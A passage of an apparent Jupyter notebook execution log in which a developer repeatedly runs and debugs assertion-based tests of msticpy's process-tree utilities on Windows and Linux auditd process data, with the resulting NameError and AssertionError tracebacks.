\u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0ms_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mNameError\u001b[0m: name 's_tree' is not defined" ] } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:17:02.936Z" }, { "cell": { "executionCount": 5, "executionEventId": "c6b2e09a-d4fa-4925-8de1-82e61df0e6f2", "hasError": false, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "assert len(ptutil.get_roots(p_tree)) == 10\nt_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:17:36.216Z" }, { "cell": { "executionCount": 6, "executionEventId": "9db1cb61-cd47-43ed-9e90-43ac1ca8a29f", "hasError": true, "id": "8daff457-1793-41c5-8a53-32ee77a2d3a8", "outputs": [ { "ename": "NameError", "evalue": "name 'linux_proc' is not defined", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mNameError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[1;32m----> 1\u001b[1;33m \u001b[0mlinux_proc_test\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mlinux_proc\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;36m1000\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 2\u001b[0m \u001b[0mp_tree_l\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mbuild_process_tree\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mlinux_proc_test\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mshow_progress\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mdebug\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;32mTrue\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mNameError\u001b[0m: name 'linux_proc' is not defined" ] } ], "persistentId": "f60daf1c-6e02-437f-b160-119cabaf78ad", "text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)" }, "executionTime": "2019-12-13T21:28:34.067Z" }, { "cell": { "executionCount": 7, "executionEventId": "8818282d-e4e6-4dd9-a5a0-139898c773a9", "hasError": false, "id": "4e1af7b3-205b-4f5f-8920-6f42d637e97c", "outputs": [], "persistentId": "087a8016-3bfa-41be-9f01-05822405a004", "text": "from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset\n# linux_events_all = pd.read_pickle(\"../experimental/linux_events_all.pkl\")\nlinux_events_all = pd.read_pickle(\"linux_events_all.pkl\")\nlen(linux_events_all)\nlinux_proc = get_event_subset(linux_events_all, \"SYSCALL_EXECVE\")\nlinux_proc.columns\nlen(linux_proc)\npd.to_pickle(linux_proc, \"../demos/data/linux_proc_test.pkl\")" }, "executionTime": "2019-12-13T21:28:41.917Z" }, { "cell": { "executionCount": 8, "executionEventId": "b292254e-8516-48a9-8d6b-efcf9c1df1a8", "hasError": false, "id": "8daff457-1793-41c5-8a53-32ee77a2d3a8", "outputs": [ { "data": { "application/vnd.jupyter.widget-view+json": { "model_id": "1a3c4a26e7ae4d0c86fd706498fdb9b2", "version_major": 2, "version_minor": 0 }, "text/plain": "HBox(children=(IntProgress(value=0, bar_style='info', description='Progress:'), Label(value='0%')))" }, "metadata": {}, "output_type": "display_data" }, { "name": "stdout", "output_type": "stream", "text": "Original # procs 1000\nMerged # procs 1000\nMerged # procs - dropna 303\nUnique merged_procs index in merge 1000\nThese two should add up to top line\nRows with dups 0\nRows with no dups 1000\n0 + 1000 = 1000\noriginal: 1000 inferred_parents 29 combined 1029\nhas parent time 647\neffectivelogonId in subjectlogonId 1029\nparent_proc_lc in procs 1000\nProcessId in ParentProcessId 532\nParent_key in proc_key 1000\nParent_key not in proc_key 29\nParent_key is NA 29\n{'Processes': 1029, 'RootProcesses': 29, 'LeafProcesses': 497, 'BranchProcesses': 503, 'IsolatedProcesses': 0, 'LargestTreeDepth': 5}\n" } ], "persistentId": "f60daf1c-6e02-437f-b160-119cabaf78ad", "text": "linux_proc_test = linux_proc.iloc[:1000]\np_tree_l = ptutil.build_process_tree(linux_proc_test, show_progress=True, debug=True)" }, "executionTime": "2019-12-13T21:28:44.326Z" }, { "cell": { "executionCount": 9, "executionEventId": "7bcd018f-ee7b-494e-a3d3-6bb4eb7ad0cf", "hasError": false, "id": "4e1af7b3-205b-4f5f-8920-6f42d637e97c", "outputs": [], "persistentId": "087a8016-3bfa-41be-9f01-05822405a004", "text": "from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset\n# linux_events_all = pd.read_pickle(\"../experimental/linux_events_all.pkl\")\nlinux_events_all = pd.read_pickle(\"linux_events_all.pkl\")\nlen(linux_events_all)\nlinux_proc = get_event_subset(linux_events_all, \"SYSCALL_EXECVE\")\nlinux_proc.columns\nlen(linux_proc)\npd.to_pickle(linux_proc.iloc[:1000], \"../demos/data/linux_proc_test.pkl\")" }, "executionTime": "2019-12-13T21:29:18.632Z" }, { "cell": { "executionCount": 10, "executionEventId": "2c17ab4d-aee6-4326-a1e7-3517dfbe7920", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m4\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:35:33.600Z" }, { "cell": { "executionCount": 12, "executionEventId": "16362baa-0af6-4d36-b14f-73642da5bf16", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:38:38.051Z" }, { "cell": { "executionCount": 14, "executionEventId": "2eaf8840-79c1-4b79-8397-2ff07686fa76", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m1\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[1]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:38:51.637Z" }, { "cell": { "executionCount": 16, "executionEventId": "c0107255-05da-4b5c-ab3b-463584c7887e", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 2\u001b[0m \u001b[0mt_root\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_roots\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0miloc\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;36m0\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 3\u001b[0m \u001b[0mfull_tree\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_descendents\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 4\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m25\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 6\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert len(full_tree) == 25\nchildren = ptutil.get_children(p_tree_l, t_root)\nassert len(children) == 13\n\ndepth = full_tree[\"path\"].str.count(\"/\").max() + 1\nbottom_desc = full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1].iloc[0]\n\nassert len(ptutil.get_ancestors(p_tree_l, bottom_desc)) == 3\n\nassert isinstance(ptutil.get_parent(p_tree_l, bottom_desc), pd.Series)\nassert (ptutil.get_process(p_tree_l, bottom_desc.name).dropna() == bottom_desc.dropna()).all()\nassert (ptutil.get_process(p_tree_l, bottom_desc).dropna() == bottom_desc.dropna()).all()\nptutil.build_process_key(bottom_desc) == bottom_desc.name\n\nassert (ptutil.get_root(p_tree_l, bottom_desc).dropna() == t_root.dropna()).all()\n\nchildren2 = ptutil.get_children(p_tree_l, t_root, include_source=False)\nassert len(children2) == len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=True))\nassert len(children2) == (len(ptutil.get_siblings(p_tree_l, children2.iloc[0], include_source=False)) + 1)\nassert ptutil.get_summary_info(p_tree_l) == {\n 'Processes': 1010,\n 'RootProcesses': 10,\n 'LeafProcesses': 815,\n 'BranchProcesses': 185,\n 'IsolatedProcesses': 0,\n 'LargestTreeDepth': 7}\n\nassert ptutil.infer_schema(p_tree_l) == ptutil.WIN_EVENT_SCH" }, "executionTime": "2019-12-13T21:39:02.341Z" }, { "cell": { "executionCount": 18, "executionEventId": "4c080033-4bb9-4633-ba59-d371c1b58ff1", "hasError": true, "id": "77f00558-8d9a-44ba-b022-4d48ccbac5f2", "outputs": [ { "ename": "AssertionError", "evalue": "", "output_type": "error", "traceback": [ "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m", "\u001b[1;31mAssertionError\u001b[0m Traceback (most recent call last)", "\u001b[1;32m\u001b[0m in \u001b[0;36m\u001b[1;34m\u001b[0m\n\u001b[0;32m 4\u001b[0m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfull_tree\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m871\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[0mchildren\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mptutil\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget_children\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mp_tree_l\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mt_root\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 6\u001b[1;33m \u001b[1;32massert\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mchildren\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;36m13\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 7\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 8\u001b[0m \u001b[0mdepth\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mfull_tree\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m\"path\"\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mstr\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mcount\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m\"/\"\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mmax\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;33m+\u001b[0m \u001b[1;36m1\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", "\u001b[1;31mAssertionError\u001b[0m: " ] } ], "persistentId": "f3fdc570-35d1-49cd-bfbf-c3a305566e20", "text": "\nassert len(ptutil.get_roots(p_tree_l)) == 29\nt_root = ptutil.get_roots(p_tree_l).iloc[0]\nfull_tree = ptutil.get_descendents(p_tree_l, t_root)\nassert 